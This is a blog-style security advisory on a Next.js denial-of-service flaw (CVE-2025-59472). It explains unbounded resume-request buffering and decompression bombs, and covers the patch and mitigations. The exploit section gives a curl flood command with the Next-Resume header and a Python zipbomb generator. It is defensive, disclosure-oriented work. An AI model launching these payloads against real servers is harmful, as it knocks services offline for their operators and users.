CVE-2025-59472

Next.js PPR: When 'Minimal Mode' Maximizes Your Downtime

Alon Barad
Alon Barad
Software Engineer

Jan 28, 2026·6 min read·7 visits

Executive Summary (TL;DR)

Next.js 'minimal mode' with PPR enabled listened to resume requests without size limits. Attackers could send massive payloads or zipbombs, causing the Node.js process to run out of memory and crash instantly.

A Denial of Service (DoS) vulnerability exists in Next.js versions utilizing Partial Prerendering (PPR) in 'minimal mode'. An unauthenticated attacker can exploit the 'resume' endpoint by sending an unbounded or maliciously compressed POST body, leading to a heap out-of-memory (OOM) crash via either unchecked buffer concatenation or a decompression bomb.

The Hook: The Shiny New Hammer

In the relentless pursuit of faster First Contentful Paints (FCP), Next.js introduced Partial Prerendering (PPR). It's a clever hybrid model where a static shell is served immediately, and the dynamic bits are streamed in later. To make this magic work across distributed systems (like Vercel's own infrastructure or complex container setups), there's a configuration flag called Minimal Mode (NEXT_PRIVATE_MINIMAL_MODE).

When this mode is active, the Next.js server acts a bit differently. It expects to be part of a relay race, receiving a 'postponed state' from a previous hop to resume rendering. It exposes a mechanism to accept this state via a POST request.

Here's the kicker: The developers assumed that these POST requests would come from trusted internal infrastructure or a well-behaved proxy. But as any security researcher knows, assumptions are the mother of all exploits. The endpoint handling these resume requests didn't just trust the source; it trusted the size of the data implicitly. That's like agreeing to eat whatever someone puts on your plate without asking if it's a 12oz steak or a whole cow.

The Flaw: The Glutton and the Bomb

The vulnerability stems from a classic violation of the 'Never Trust User Input' commandment, specifically regarding resource allocation. The flaw manifests in two distinct but equally deadly ways within the base-server.ts logic.

Vector A: The Glutton (Unbounded Buffering) When the server sees the Next-Resume: 1 header, it starts listening to the request stream. In the vulnerable versions, it simply pushed every chunk of data it received into an array and then attempted to merge them using Buffer.concat(). There was no brake pedal. If you sent 4GB of data, the server allocated memory for 4GB of data. In V8 (the JavaScript engine powering Node.js), the heap has a hard limit. Cross that line, and the process commits seppuku.

Vector B: The Zipbomb (Decompression) It gets worse. This postponed state is usually compressed to save bandwidth. The server used zlib.inflateSync() to unpack it. The keyword here is Sync. Not only does this block the event loop, but the implementation also lacked a maxOutputLength. An attacker could send a tiny, valid 1MB gzip payload that expands into gigabytes of zeros. The server blindly attempts to allocate memory for the uncompressed result, triggering an instant OOM crash before the upload even finishes.

The Code: Autopsy of a Crash

Let's look at the smoking gun in base-server.ts. This is the code that blindly accepted the resume data.

The Vulnerable Code:

// The "Before" Logic
if (req.headers['next-resume'] === '1') {
  const body = []
  req.on('data', (chunk) => {
    body.push(chunk) // <--- No size check!
  })
  req.on('end', () => {
    const buffer = Buffer.concat(body) // <--- Fatal OOM happens here
    // ... proceed to unzip without limits
  })
}

The Fix (Next.js 16.1.5):

The patch introduces a strict diet. They implemented a size counter that increments with every chunk. If the accumulator exceeds the new experimental.maxPostponedStateSize (default 10MB), the server immediately bails with a 413 error.

// The "After" Logic
let receivedSize = 0
const MAX_SIZE = 10 * 1024 * 1024; // 10MB default
 
req.on('data', (chunk) => {
  receivedSize += chunk.length
  if (receivedSize > MAX_SIZE) {
    // Abort request immediately
    res.statusCode = 413
    res.end('Payload Too Large')
    return
  }
  body.push(chunk)
})

Furthermore, for the decompression vector, they wrapped the inflate call to ensure the output size doesn't exceed a multiplier (5x) of the input size. This kills the zipbomb dead.

The Exploit: Crashing the Party

Exploiting this is trivially easy if you can reach a Next.js instance running in minimal mode with PPR. You don't need authentication. You don't need a user account. You just need curl.

Scenario 1: The Raw Flood If you have a fast uplink, you can just pour data into the socket until the server dies.

# Generate a 2GB file of garbage
dd if=/dev/urandom of=doom.bin bs=1M count=2048
 
# Send it with the magic header
curl -X POST \
  -H "Next-Resume: 1" \
  --data-binary @doom.bin \
  https://target-nextjs-app.com/any-route

Scenario 2: The Silent Assassin (Zipbomb) This is more elegant. We create a highly compressed payload that fits in a standard request but explodes in memory. This bypasses typical WAF/Proxy body size limits (which might cap requests at 10MB) because the compressed payload is small.

# generate_bomb.py
import zlib
# Create a string of 1GB of 'A's
payload = b'A' * (1024 * 1024 * 1024)
# Compress it
compressed = zlib.compress(payload)
# Write to file (result is approx 1MB)
with open('bomb.gz', 'wb') as f:
    f.write(compressed)

When the server receives bomb.gz, zlib.inflateSync tries to allocate the full 1GB contiguous string on the heap. Game over.

The Impact: Why Should We Panic?

This is a high-impact Availability vulnerability (The 'A' in CIA triad). While it doesn't leak data (Confidentiality) or allow code modification (Integrity), it allows a single malicious actor to take down an entire rendering fleet.

In a containerized environment (like Kubernetes), the pod will crash. The orchestrator will restart it. The attacker sends another request. The pod crashes again. This creates a CrashLoopBackOff scenario, effectively taking the service offline permanently as long as the attack persists.

For serverless environments, the impact is financial and operational. You are paying for the compute time to process these massive blobs right up until the crash, and the resulting cold starts will degrade performance for legitimate users. It's a remarkably cheap attack to execute with expensive consequences for the defender.

The Fix: Putting the Genie Back in the Bottle

The remediation is straightforward: Update Next.js. The patch was backported, so you have options depending on your major version.

Patch Levels:

  • Next.js 16: Update to v16.1.5 or later.
  • Next.js 15: Update to v15.6.0-canary.61 or later.

If you cannot upgrade immediately, your options are limited but effective:

  1. Disable Minimal Mode: If you aren't strictly required to use NEXT_PRIVATE_MINIMAL_MODE=1 (e.g., you aren't running on a specific provider that mandates it), turn it off. The vulnerable code path is gated behind this environment variable.
  2. WAF Filtering: Configure your Web Application Firewall to drop any POST request containing the Next-Resume header if it comes from the public internet. This header should essentially only ever originate from trusted internal infrastructure.

Technical Appendix

CVSS Score
5.9/ 10
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Probability
0.04%
Top 88% most exploited

Affected Systems

Next.js 15.x < 15.6.0-canary.61Next.js 16.x < 16.1.5

Affected Versions Detail

Product
Affected Versions
Fixed Version
Next.js
Vercel
15.0.0 - 15.6.0-canary.6015.6.0-canary.61
Next.js
Vercel
16.0.0 - 16.1.416.1.5
AttributeDetail
CWE IDCWE-400 (Uncontrolled Resource Consumption)
Attack VectorNetwork (POST Request)
CVSS5.9 (Medium)
ImpactDenial of Service (OOM Crash)
EPSS Score0.0004
Vulnerable ConfigMinimal Mode + PPR
CWE-400
Uncontrolled Resource Consumption

Vulnerability Timeline

Fix committed to Next.js repository
2026-01-07
CVE Published
2026-01-26
Next.js 16.1.5 released
2026-01-26

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.